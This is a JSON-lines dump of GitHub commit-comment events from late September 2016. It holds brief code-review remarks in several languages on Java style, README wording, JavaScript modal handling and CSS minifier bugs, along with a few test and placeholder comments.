{"id":"4637090792","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223372,"position":null,"line":null,"path":null,"commit_id":"bd4e32f84852967fa56cfd834a568fc8fd2e42bf","created_at":"2016-09-29T13:04:12Z","updated_at":"2016-09-29T13:04:12Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=10)"}},"created_at":"2016-09-29T13:04:12Z"}
{"id":"4637094066","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223381,"position":36,"line":36,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T13:04:48Z","updated_at":"2016-09-29T13:04:48Z","body":"não precisa de tantos parenteses:\r\n\r\n```Java\r\nif (this.dataNascimento.ehBissexto() && this.getQuantVida() >= 80 && this.getQuantVida() <= 90) {\r\n```"}},"created_at":"2016-09-29T13:04:48Z"}
{"id":"4637098225","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223394,"position":23,"line":23,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:05:37Z","updated_at":"2016-09-29T13:05:37Z","body":"I suggest to add anchor to the text `using the `oc cluster up` command`. WDYT?"}},"created_at":"2016-09-29T13:05:37Z"}
{"id":"4637098710","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223396,"position":5,"line":5,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:05:42Z","updated_at":"2016-09-29T13:05:42Z","body":"Pre-created hostpath PVs is for local testing, not part of the template. The template should work with any other type of storage, no?"}},"created_at":"2016-09-29T13:05:42Z"}
{"id":"4637099890","type":"CommitCommentEvent","actor":{"login":"chanwidpe1"},"repo":{"name":"chanwidpe1/raspi"},"payload":{"comment":{"id":19223400,"position":7,"line":7,"path":"README.md","commit_id":"f046570503360c3c6235def02c3fdc7fda87f81d","created_at":"2016-09-29T13:05:54Z","updated_at":"2016-09-29T13:05:54Z","body":"gdfgdf"}},"created_at":"2016-09-29T13:05:54Z"}
{"id":"4637103257","type":"CommitCommentEvent","actor":{"login":"manumanfred"},"repo":{"name":"Dreams-N/android_vendor_ds"},"payload":{"comment":{"id":19223406,"position":null,"line":null,"path":null,"commit_id":"0601d503f9cb64cea2f954e5c61bc1ab7ac053b5","created_at":"2016-09-29T13:06:34Z","updated_at":"2016-09-29T13:06:34Z","body":"Haha, yes. @ishantvivek  "}},"created_at":"2016-09-29T13:06:34Z"}
{"id":"4637103563","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223407,"position":39,"line":39,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T13:06:37Z","updated_at":"2016-09-29T13:06:37Z","body":"```Java\r\nif (!this.dataNascimento.ehBissexto() && (this.nome == \"Seixas\" || this.nome == \"Meireles\")){\r\n```"}},"created_at":"2016-09-29T13:06:37Z"}
{"id":"4637104643","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223411,"position":null,"line":null,"path":null,"commit_id":"b77d294b09631308fe8d9ba4a585532dcb9ee8da","created_at":"2016-09-29T13:06:50Z","updated_at":"2016-09-29T13:06:50Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=12)"}},"created_at":"2016-09-29T13:06:50Z"}
{"id":"4637106660","type":"CommitCommentEvent","actor":{"login":"smlombardi"},"repo":{"name":"PBGUX/starter-app"},"payload":{"comment":{"id":19223416,"position":null,"line":null,"path":null,"commit_id":"3c133314184a48ee6cb92c1dd42641e5b2ff87a1","created_at":"2016-09-29T13:07:12Z","updated_at":"2016-09-29T13:07:12Z","body":"@danielcollettepb  you have a typo on line 37"}},"created_at":"2016-09-29T13:07:12Z"}
{"id":"4637106887","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223418,"position":null,"line":null,"path":null,"commit_id":"76aac08c9e0a75cde5fffe0c522cbbf7e157735f","created_at":"2016-09-29T13:07:14Z","updated_at":"2016-09-29T13:07:14Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=13)"}},"created_at":"2016-09-29T13:07:14Z"}
{"id":"4637106993","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223419,"position":5,"line":5,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:07:15Z","updated_at":"2016-09-29T13:07:15Z","body":"Yes, you're right."}},"created_at":"2016-09-29T13:07:15Z"}
{"id":"4637109074","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223424,"position":null,"line":null,"path":null,"commit_id":"213c553e7ad56cf7fee8e762d05be7ebffaf8b99","created_at":"2016-09-29T13:07:39Z","updated_at":"2016-09-29T13:07:39Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=14)"}},"created_at":"2016-09-29T13:07:39Z"}
{"id":"4637109439","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223425,"position":23,"line":23,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:07:43Z","updated_at":"2016-09-29T13:07:43Z","body":"Yes, works for me as well!"}},"created_at":"2016-09-29T13:07:43Z"}
{"id":"4637113849","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223442,"position":null,"line":null,"path":null,"commit_id":"ffc0d21385023980a730db9e27c1709161f6fc0a","created_at":"2016-09-29T13:08:32Z","updated_at":"2016-09-29T13:08:32Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=16)"}},"created_at":"2016-09-29T13:08:32Z"}
{"id":"4637114879","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223446,"position":30,"line":30,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:08:45Z","updated_at":"2016-09-29T13:08:45Z","body":"We update URL to be ` .../2.4/examples/petset/mongodb-clustered.yaml`"}},"created_at":"2016-09-29T13:08:45Z"}
{"id":"4637115150","type":"CommitCommentEvent","actor":{"login":"spzSource"},"repo":{"name":"AlexeyRadkevich/Lab1_QuickSort"},"payload":{"comment":{"id":19223448,"position":17,"line":17,"path":"UnitTestProject1/UnitTestQuickSort.cs","commit_id":"0b8ef2f937425c78dde426e50e22a009d01d8125","created_at":"2016-09-29T13:08:48Z","updated_at":"2016-09-29T13:08:48Z","body":"Really? Do you think that this is enough?\r\n![image](https://cloud.githubusercontent.com/assets/2921990/18955140/bc7311a6-865e-11e6-8490-15680ad5a0db.png)\r\n"}},"created_at":"2016-09-29T13:08:48Z"}
{"id":"4637115546","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19223449,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T13:08:53Z","updated_at":"2016-09-29T13:08:53Z","body":"我去看一看"}},"created_at":"2016-09-29T13:08:53Z"}
{"id":"4637115984","type":"CommitCommentEvent","actor":{"login":"danielcollettepb"},"repo":{"name":"PBGUX/starter-app"},"payload":{"comment":{"id":19223451,"position":null,"line":null,"path":null,"commit_id":"3c133314184a48ee6cb92c1dd42641e5b2ff87a1","created_at":"2016-09-29T13:08:58Z","updated_at":"2016-09-29T13:08:58Z","body":"good catch (line 27)... I'll change"}},"created_at":"2016-09-29T13:08:58Z"}
{"id":"4637116331","type":"CommitCommentEvent","actor":{"login":"lambdalisue"},"repo":{"name":"ckirby/django-inspectional-registration"},"payload":{"comment":{"id":19223452,"position":null,"line":null,"path":null,"commit_id":"fb25fd263d41bb49576047d35007dc7bd1cf7883","created_at":"2016-09-29T13:09:02Z","updated_at":"2016-09-29T13:09:02Z","body":"Could you send me a PR?"}},"created_at":"2016-09-29T13:09:02Z"}
{"id":"4637121504","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223466,"position":24,"line":24,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T13:09:59Z","updated_at":"2016-09-29T13:09:59Z","body":"Note que você está chamando duas vezes o método `getNumeroSorte()`. Para nosso exemplo, isso é OK. Mas imagine se um dia o método `getNumeroSorte()` executar muitas coisas e for muito lento. Você estará pagando um preço dobrado por chamar duas vezes. Neste caso é melhor armazenar o resultado em uma variável e re-utilizá-la:\r\n\r\n```Java\r\ndouble numeroSorte = getNumeroSorte();\r\nif (numeroSorte < 0) { }\r\nif (numeroSorte > 100) { }\r\n```"}},"created_at":"2016-09-29T13:09:59Z"}
{"id":"4637121776","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19223467,"position":4,"line":16,"path":"test/resources/org/zaproxy/zap/spider/parser/CommentWithoutElementsSpiderHtmlParser.html","commit_id":"b1d477fa97ad882f7f2d3be8128b9e770f0f2e67","created_at":"2016-09-29T13:10:02Z","updated_at":"2016-09-29T13:10:02Z","body":"Should we be handling other bracket types? Square, curly?"}},"created_at":"2016-09-29T13:10:02Z"}
{"id":"4637123837","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"BoumSam13/bloccit"},"payload":{"comment":{"id":19223469,"position":28,"line":28,"path":"app/controllers/api/v1/posts_controller.rb","commit_id":"589140ddb3ed5d35fdac50c7d0510fba17f8c82c","created_at":"2016-09-29T13:10:24Z","updated_at":"2016-09-29T13:10:24Z","body":"Need to set the user here? `post.user = current_user`"}},"created_at":"2016-09-29T13:10:24Z"}
{"id":"4637123981","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223471,"position":47,"line":47,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:10:25Z","updated_at":"2016-09-29T13:10:25Z","body":"s/OpenShift project/project/ ?"}},"created_at":"2016-09-29T13:10:25Z"}
{"id":"4637124361","type":"CommitCommentEvent","actor":{"login":"pleerock"},"repo":{"name":"typeorm/typeorm-routing-controllers-extensions"},"payload":{"comment":{"id":19223475,"position":158,"line":158,"path":"README.md","commit_id":"fe70f100fb86ad425b0795a9de3ba96f36b8e0a5","created_at":"2016-09-29T13:10:30Z","updated_at":"2016-09-29T13:10:30Z","body":"damn yeah :("}},"created_at":"2016-09-29T13:10:30Z"}
{"id":"4637124520","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"jgm/pandoc-templates"},"payload":{"comment":{"id":19223476,"position":5,"line":232,"path":"default.revealjs","commit_id":"cbbadf94c8772337a6489a2d0f636030e2a13d00","created_at":"2016-09-29T13:10:31Z","updated_at":"2016-09-29T13:10:31Z","body":"I'm soo sorry about this typo I've made... `s/socker/socket/`"}},"created_at":"2016-09-29T13:10:31Z"}
{"id":"4637127426","type":"CommitCommentEvent","actor":{"login":"mirabilos"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19223481,"position":null,"line":null,"path":null,"commit_id":"a414d20846c465c55f67a7e87cbe27f5b32fb73f","created_at":"2016-09-29T13:11:05Z","updated_at":"2016-09-29T13:11:05Z","body":"Dominik George dixit:\n\n>Oh, no… now I see what the last `else`  clause does. That's an even\n>better solution.\n\n;-)\n\n>Hmm, well… actually, isn't it still a reasonable thing to perss\n>ScrollLock twice in normal operation?\n\nNot really... ScrollLock is basically \"not used, period\",\nand, see above (last \"else\" clause), it really has to be\nin immediate sequence.\n\n>So maybe an additional guard\n>with a timer would still make sens.\n\nTimers in userspace are hard and expensive.\n\nFrom a user's PoV, I'd expect them to notice when pressing\nScrollLock does not make a sound suddenly, and just revert\nthat. ;-)\n\nSometimes, the solution to a problem can be non-technical\nand as easy as that.\n\nbye,\n//mirabilos\n-- \n(gnutls can also be used, but if you are compiling lynx for your own use,\nthere is no reason to consider using that package)\n\t-- Thomas E. Dickey on the Lynx mailing list, about OpenSSL\n"}},"created_at":"2016-09-29T13:11:05Z"}
{"id":"4637128454","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19223485,"position":null,"line":null,"path":null,"commit_id":"a3548e8959ba02bc66e4aa81e4708da7b425f4aa","created_at":"2016-09-29T13:11:17Z","updated_at":"2016-09-29T13:11:17Z","body":"邮箱貌似写错了 上回我commit with被aofall训了一顿 :confused: "}},"created_at":"2016-09-29T13:11:17Z"}
{"id":"4637129039","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19223488,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T13:11:24Z","updated_at":"2016-09-29T13:11:24Z","body":"Хорошо, убедили."}},"created_at":"2016-09-29T13:11:24Z"}
{"id":"4637129879","type":"CommitCommentEvent","actor":{"login":"JuanchiRios"},"repo":{"name":"thin-languages/uqbar-plugins"},"payload":{"comment":{"id":19223490,"position":24,"line":29,"path":"src/test/scala/org/uqbar/plugins/CoreTest.scala","commit_id":"740f69ac3dfe4e8b0b3ce1b3348ceba8f81b2543","created_at":"2016-09-29T13:11:32Z","updated_at":"2016-09-29T13:11:32Z","body":"@JuanFdS why do you delete the todo without implenting it "}},"created_at":"2016-09-29T13:11:32Z"}
{"id":"4637130522","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19223493,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T13:11:40Z","updated_at":"2016-09-29T13:11:40Z","body":"另外，你试试你的显卡用1000个图标那个Demo，能有多少FPS。\r\n我的集显500对象时能达到60，1000对象时只有30多了。\r\n另外，看起来WPF每秒最多只给渲染60帧的样子。"}},"created_at":"2016-09-29T13:11:40Z"}
{"id":"4637132533","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19223496,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T13:12:03Z","updated_at":"2016-09-29T13:12:03Z","body":"@andytimes 有墙中墙的感觉么 我们这里也是价格优惠 学校门口都有广告"}},"created_at":"2016-09-29T13:12:03Z"}
{"id":"4637133243","type":"CommitCommentEvent","actor":{"login":"blackdaemon"},"repo":{"name":"blackdaemon/ulogme"},"payload":{"comment":{"id":19223498,"position":null,"line":null,"path":null,"commit_id":"2ff838bcb5e3bbd2a19fd907a9ce915f37b18998","created_at":"2016-09-29T13:12:13Z","updated_at":"2016-09-29T13:12:13Z","body":"![screenshot-ulogme-1](https://cloud.githubusercontent.com/assets/6154/18955291/16f6e48e-8657-11e6-8cf5-3cc2cd648eed.png)\r\n"}},"created_at":"2016-09-29T13:12:13Z"}
{"id":"4637134022","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223504,"position":72,"line":72,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:12:22Z","updated_at":"2016-09-29T13:12:22Z","body":"s/a election/an election/ ?"}},"created_at":"2016-09-29T13:12:22Z"}
{"id":"4637139055","type":"CommitCommentEvent","actor":{"login":"AlliedCore"},"repo":{"name":"AlliedCore/Prison"},"payload":{"comment":{"id":19223511,"position":null,"line":null,"path":null,"commit_id":"1c6a2e94330fb5f779af51e0c4bcb0e310886e79","created_at":"2016-09-29T13:13:17Z","updated_at":"2016-09-29T13:13:17Z","body":"Make sure to take a look"}},"created_at":"2016-09-29T13:13:17Z"}
{"id":"4637141364","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19223515,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T13:13:41Z","updated_at":"2016-09-29T13:13:41Z","body":"嗯，我也不知道为什么，WinForm也只有60多"}},"created_at":"2016-09-29T13:13:41Z"}
{"id":"4637145536","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"felipet-vsouza/crescer-2016-2"},"payload":{"comment":{"id":19223524,"position":9,"line":25,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"81733317368b383ebea0646e323fbbaeb28afbeb","created_at":"2016-09-29T13:14:28Z","updated_at":"2016-09-29T13:14:28Z","body":"pode fazer tudo na mesma linha:\r\n\r\n```Java\r\nnumero = numero * 33 % 100;\r\n```"}},"created_at":"2016-09-29T13:14:28Z"}
{"id":"4637146225","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19223525,"position":131,"line":131,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T13:14:36Z","updated_at":"2016-09-29T13:14:36Z","body":"All things that open popuppy should listen to escape, but I think we want the listener to go on the document, right? and remove that listener once our model gets closed since there may be other esc listeners floating around any page.\r\nIn the past I've always set the listener in the modal open() func and removed as cleanup in the modal close() func."}},"created_at":"2016-09-29T13:14:36Z"}
{"id":"4637148973","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223530,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:15:07Z","updated_at":"2016-09-29T13:15:07Z","body":"dfsgdsfgdsfgdsfg"}},"created_at":"2016-09-29T13:15:07Z"}
{"id":"4637150984","type":"CommitCommentEvent","actor":{"login":"brandonsturgeon"},"repo":{"name":"kennethreitz/autoenv"},"payload":{"comment":{"id":19223536,"position":null,"line":null,"path":null,"commit_id":"42fa56fc14a42ea06e2aea51ac13a52c694cdff4","created_at":"2016-09-29T13:15:27Z","updated_at":"2016-09-29T13:15:27Z","body":"Stellar commit. Good job everyone."}},"created_at":"2016-09-29T13:15:27Z"}
{"id":"4637151242","type":"CommitCommentEvent","actor":{"login":"HannuLahtinen"},"repo":{"name":"HannuLahtinen/jboss-modules"},"payload":{"comment":{"id":19223537,"position":null,"line":null,"path":null,"commit_id":"246204425eb6696dca05471333e20922bc3d9da7","created_at":"2016-09-29T13:15:30Z","updated_at":"2016-09-29T13:15:30Z","body":"Proposed fix for the https://issues.jboss.org/browse/MODULES-263"}},"created_at":"2016-09-29T13:15:30Z"}
{"id":"4637155582","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223549,"position":128,"line":128,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:16:18Z","updated_at":"2016-09-29T13:16:18Z","body":"s/was deleted/were deleted/"}},"created_at":"2016-09-29T13:16:18Z"}
{"id":"4637156974","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"minsk-hackerspace/hsWEB"},"payload":{"comment":{"id":19223551,"position":null,"line":null,"path":null,"commit_id":"350d24b2f8c09eedf53764569f5a1d58f3e81d59","created_at":"2016-09-29T13:16:34Z","updated_at":"2016-09-29T13:16:34Z","body":"А можно это в markdown хранить в `content/rules.md`, а не в китайском?"}},"created_at":"2016-09-29T13:16:34Z"}
{"id":"4637157409","type":"CommitCommentEvent","actor":{"login":"stas"},"repo":{"name":"Courseware/courseware.github.com"},"payload":{"comment":{"id":19223552,"position":null,"line":null,"path":null,"commit_id":"28e18b4939296bba05abebd93c4113586b1ccc7e","created_at":"2016-09-29T13:16:40Z","updated_at":"2016-09-29T13:16:40Z","body":"Done :)"}},"created_at":"2016-09-29T13:16:40Z"}
{"id":"4637158077","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19223554,"position":139,"line":139,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T13:16:47Z","updated_at":"2016-09-29T13:16:47Z","body":"Yeah looking at that, we could get away with keeping using a class to reference but use the modal itself instead of the document for the root.\r\n`modalDialog.getElementsByClassName('close')[0].`"}},"created_at":"2016-09-29T13:16:47Z"}
{"id":"4637159771","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223558,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:17:05Z","updated_at":"2016-09-29T13:17:05Z","body":"dfghdfghgfhgf"}},"created_at":"2016-09-29T13:17:05Z"}
{"id":"4637163505","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223573,"position":69,"line":69,"path":"src/pl/pikselke/mchw/bag/BackPack.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:17:44Z","updated_at":"2016-09-29T13:17:44Z","body":"Hym, całość zapisujesz w głównym configu, co jest przy dużej ilości danych okropne. Zrób zapis na zasadzie: `1 plecak == 1 plik`.\r\nDzięki temu będzie o wiele lepiej, i szybciej.\r\nTylko pliz, nie yaml."}},"created_at":"2016-09-29T13:17:44Z"}
{"id":"4637165175","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19223576,"position":150,"line":150,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T13:18:01Z","updated_at":"2016-09-29T13:18:01Z","body":"I was assuming this is not meant for production, but for testing. I can't even run this in my terminal, this looks like a first-pass code review to catch stuff while Jason is still building it."}},"created_at":"2016-09-29T13:18:01Z"}
{"id":"4637165450","type":"CommitCommentEvent","actor":{"login":"nmt1994"},"repo":{"name":"oonasal/Eduma_App"},"payload":{"comment":{"id":19223577,"position":null,"line":null,"path":null,"commit_id":"b7b7bdc42cf3e3dae5dc1b11746981bb0663c8e6","created_at":"2016-09-29T13:18:04Z","updated_at":"2016-09-29T13:18:04Z","body":"A good REST Api response code practice \r\nhttp://stackoverflow.com/questions/942951/rest-api-error-return-good-practices\r\n\r\n I would very like to change the number 404 ( where can be confused as routes not found ) "}},"created_at":"2016-09-29T13:18:04Z"}
{"id":"4637169398","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223588,"position":142,"line":142,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:18:44Z","updated_at":"2016-09-29T13:18:44Z","body":"Do we have a link for that?"}},"created_at":"2016-09-29T13:18:44Z"}
{"id":"4637169737","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223589,"position":22,"line":22,"path":"src/pl/pikselke/mchw/bag/BackPack.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:18:47Z","updated_at":"2016-09-29T13:18:47Z","body":"Meh, powinno być `private final static Map<UUID, Inventory> backpacks = new HashMap<>();`"}},"created_at":"2016-09-29T13:18:47Z"}
{"id":"4637171646","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19223596,"position":42,"line":42,"path":"test/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T13:19:07Z","updated_at":"2016-09-29T13:19:07Z","body":"Will we also discuss this on the Compounds talk on Monday? Or is testing outside that?"}},"created_at":"2016-09-29T13:19:07Z"}
{"id":"4637172453","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223599,"position":135,"line":135,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:19:15Z","updated_at":"2016-09-29T13:19:15Z","body":"As a user I would like to have an copy-paste-ready example :)"}},"created_at":"2016-09-29T13:19:15Z"}
{"id":"4637172552","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223600,"position":53,"line":35,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:19:16Z","updated_at":"2016-09-29T13:19:16Z","body":"I po co dalej castujesz bez sensu?"}},"created_at":"2016-09-29T13:19:16Z"}
{"id":"4637174491","type":"CommitCommentEvent","actor":{"login":"artefactio"},"repo":{"name":"matthiasmullie/minify"},"payload":{"comment":{"id":19223603,"position":25,"line":510,"path":"src/CSS.php","commit_id":"3253a81d07cd01afcb651e309900d8ad58a052da","created_at":"2016-09-29T13:19:33Z","updated_at":"2016-09-29T13:19:33Z","body":"I believe this line is wrong, for example border: 1px solid #f00000; is becoming border: 1px solid red000;"}},"created_at":"2016-09-29T13:19:33Z"}
{"id":"4637176512","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19223612,"position":14,"line":14,"path":"list.htm","commit_id":"145ad4b89876776b25020781739f4e1e367de33c","created_at":"2016-09-29T13:19:54Z","updated_at":"2016-09-29T13:19:54Z","body":"所在位置：后的具体内容写在一个a标签里，不用分级写好几个a"}},"created_at":"2016-09-29T13:19:54Z"}
{"id":"4637176696","type":"CommitCommentEvent","actor":{"login":"Minecrell"},"repo":{"name":"SpongePowered/SpongeVanilla"},"payload":{"comment":{"id":19223614,"position":null,"line":null,"path":null,"commit_id":"5fc6e1b84a0384a7b88ebe97df79d9906cb11323","created_at":"2016-09-29T13:19:56Z","updated_at":"2016-09-29T13:19:56Z","body":"@Zidane The second redirect changes `sendPacketToAllPlayers` to `sendPacketToAllPlayersInDimension` because Vanilla sends a part of the packets to all worlds by default. (Which is stupid but doesn't cause any issues in Vanilla because there is no weather in the nether or the end.)"}},"created_at":"2016-09-29T13:19:56Z"}
{"id":"4637177891","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19223618,"position":6,"line":6,"path":"translations/fr.json","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T13:20:09Z","updated_at":"2016-09-29T13:20:09Z","body":"Consuming team need to put proper French in there anyway... I assume after testing this would be removed, unless we're leaving a French example for consuming teams to use as a template?"}},"created_at":"2016-09-29T13:20:09Z"}
{"id":"4637178621","type":"CommitCommentEvent","actor":{"login":"Daudr"},"repo":{"name":"Daudr/magie_dinverno_materialize"},"payload":{"comment":{"id":19223620,"position":null,"line":null,"path":null,"commit_id":"75528a0729aa93919521c294acadd21eec91b753","created_at":"2016-09-29T13:20:16Z","updated_at":"2016-09-29T13:20:16Z","body":"Aggiunto live.html"}},"created_at":"2016-09-29T13:20:16Z"}
{"id":"4637178683","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223621,"position":null,"line":null,"path":null,"commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:20:17Z","updated_at":"2016-09-29T13:20:17Z","body":"@rhcarvalho Thank you!!!"}},"created_at":"2016-09-29T13:20:17Z"}
